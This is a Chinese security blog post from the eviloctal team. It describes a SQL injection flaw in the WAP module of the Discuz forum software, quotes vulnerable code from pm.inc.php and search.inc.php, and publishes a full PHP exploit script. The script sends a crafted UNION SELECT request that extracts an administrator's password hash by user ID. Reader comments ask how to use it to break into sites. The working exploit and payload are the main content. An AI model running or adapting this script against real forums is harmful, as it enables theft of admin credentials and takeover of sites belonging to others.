discuz获取任意管理员密码漏洞

文章作者:冰封浪子
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

漏洞说明:Discuz 论坛系统 是一套采用php+mysql数据库方式运行,在其中发现了一个安全漏洞,成功利用此漏洞可以提取管理员的密码进入后台,取得管理员权限。

漏洞厂商:http://www.discuz.net

漏洞解析:在Discuz的wap模块中的字符转码程序存在问题,在discuz的wap模块中,该编码转换类存在严重的问题。在Discuz中,wap是默认开启的,很容易被攻击者利用,这个问题存在与discuz所有版本中。
在discuz代码中存在多处可利用的地方,如:pm.inc.php/search.inc.php等,下面给出可疑代码片段:

pm.inc.php:

$floodctrl = $floodctrl * 2;
if($floodctrl && !$disablepostctrl && $timestamp - $lastpost < $floodctrl) {
wapmsg(’pm_flood_ctrl’);
}

if($formhash != formhash()) {
wapmsg(’wap_submit_invalid’);
}

$member = $db->fetch_first(”SELECT m.uid AS msgtoid, mf.ignorepm FROM {$tablepre}members m
LEFT JOIN {$tablepre}memberfields mf USING (uid)
WHERE username=’$msgto’”);
if(!$member) {
wapmsg(’pm_send_nonexistence’);
}
if(preg_match(”/(^{ALL}$|(,|^)\s*”.preg_quote($discuz_user, ‘/’).”\s*(,|$))/i”, $member['ignorepm'])) {
wapmsg(’pm_send_ignore’);
}
if(empty($subject) || empty($message)) {
wapmsg(’pm_sm_isnull’);
}

search.inc.php:

if(isset($searchid)) {

$page = max(1, intval($page));
$start_limit = $number = ($page - 1) * $waptpp;

$index = $db->fetch_first(”SELECT searchstring, keywords, threads, tids FROM {$tablepre}searchindex WHERE searchid=’$searchid’”);
if(!$index) {
wapmsg(’search_id_invalid1′);
}
$index['keywords'] = rawurlencode($index['keywords']);
$index['searchtype'] = preg_replace(”/^([a-z]+)\|.*/”, “\\1“, $index['searchstring']);

$searchnum = $db->result_first(”SELECT COUNT(*) FROM  {$tablepre}threads WHERE tid IN ($index[tids]) AND displayorder>=’0′”);
if($searchnum) {
echo “<p>$lang[search_result]<br />”;
$query = $db->query(”SELECT * FROM {$tablepre}threads WHERE tid IN ($index[tids]) AND displayorder>=’0′ ORDER BY dateline DESC LIMIT $start_limit, $waptpp”);
while($thread = $db->fetch_array($query)) {
echo “<a href=\”index.php?action=thread&tid=$thread[tid]\”>#”.++$number.” “.cutstr($thread['subject'], 24).”</a>($thread[views]/$thread[replies])<br />\n”;
}
echo wapmulti($searchnum, $waptpp, $page, “index.php?action=search&searchid=$searchid&do=submit&sid=$sid”);
echo ‘</p>’;
} else {
wapmsg(’search_invalid’);
}

以下是search.inc.php 文件漏洞利用代码;
注:以下漏洞纯属个人兴趣爱好,仅供大家参考

<?php
error_reporting(E_ALL&E_NOTICE);
print_r(”
+——————————————————————+
Exploit discuz6.0.1
Just work as php>=5 & mysql>=4.1
BY  冰封浪子&小志
+——————————————————————+
“);

if($argc>4)
{
$host=$argv[1];
$port=$argv[2];
$path=$argv[3];
$uid=$argv[4];
}else{
echo “Usage: php “.$argv[0].” host port path uid\n”;
echo “host:      target server \n”;
echo “port:      the web port, usually 80\n”;
echo “path:      path to discuz\n”;
echo “uid :      user ID you wanna get\n”;
echo “Example:\r\n”;
echo “php “.$argv[0].” localhost 80 1\n”;
exit;
}

$content =”action=search&searchid=22%cf’UNION SELECT 1,password,3,password/**/from/**/cdb_members/**/where/**/uid=”.$uid.”/*&do=submit”;

$data = “POST /”.$path.”/index.php”.” HTTP/1.1\r\n”;
$data .= “Accept: */*\r\n”;
$data .= “Accept-Language: zh-cn\r\n”;
$data .= “Content-Type: application/x-www-form-urlencoded\r\n”;
$data .= “User-Agent: wap\r\n”;
$data .= “Host: “.$host.”\r\n”;
$data .= “Content-length: “.strlen($content).”\r\n”;
$data .= “Connection: Close\r\n”;
$data .= “\r\n”;
$data .= $content.”\r\n\r\n”;
$ock=fsockopen($host,$port);
if (!$ock) {
echo ‘No response from ‘.$host;
die;
}
fwrite($ock,$data);
while (!feof($ock)) {
echo fgets($ock, 1024);
}
?>

相关日志

楼被抢了 3 层了... 抢座Rss 2.0或者 Trackback

  • sanm369

    本人菜鸟
    看不懂那些代码
    下次能不能告诉我们怎么去入侵就好了
    谢谢!

  • Kyd

    不行..只能输出个 身体str 首页的hmtl代码

  • use

    能不能说说如何使用

发表评论